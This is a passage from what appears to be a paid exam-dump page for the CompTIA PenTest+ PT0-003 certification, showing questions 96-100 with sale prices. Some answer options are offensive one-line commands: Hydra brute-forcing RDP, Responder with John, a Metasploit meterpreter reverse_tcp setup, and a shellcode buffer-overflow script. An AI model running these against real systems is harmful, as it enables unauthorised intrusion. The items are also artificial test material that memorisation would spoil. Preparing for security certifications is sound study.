nmap -Pn -w 10.10.10.10

D.

nmap -sV -Pn -p- 10.10.10.10

Buy Now
Questions 96

A penetration tester reviews a scan report and identifies a deserialization vulnerability. The vulnerability is due to the way a function from a Python library has been used in code. The scan does not consider input data being used in the function ' s serialization. Which of the following scan types most likely provided this finding?

Options:

A.

DAST

B.

SAST

C.

IAST

D.

SCA

Buy Now
Questions 97

A penetration tester attempts to obtain the preshared key for a client ' s wireless network. Which of the following actions will most likely aid the tester?

Options:

A.

Deploying an evil twin with a WiFi Pineapple

B.

Performing a password spraying attack with Hydra

C.

Setting up a captive portal using SET

D.

Deauthenticating clients using aireplay-ng

Buy Now
Questions 98

A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host ' s operating stability. Which of the following commands should the tester try first?

Options:

A.

responder -I eth0 john responder_output.txt < rdp to target >

B.

hydra -L administrator -P /path/to/pwlist.txt -t 100 rdp:// < target_host >

C.

msf > use < module_name > msf > set < options > msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > run

D.

python3 ./buffer_overflow_with_shellcode.py < target > 445

Buy Now
Questions 99

Which of the following elements of a penetration test report can be used to most effectively prioritize the remediation efforts for all the findings?

Options:

A.

Methodology

B.

Detailed findings list

C.

Risk score

D.

Executive summary

Buy Now
Questions 100

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

PT0-003 Question 100

Options:

Buy Now
Exam Code: PT0-003
Exam Name: CompTIA PenTest+ Exam
Last Update: Jul 1, 2026
Questions: 336

PDF + Testing Engine

$64.99   $185.69

Testing Engine

$49.99   $142.83

PDF (Q&A)

$54.99   $157.11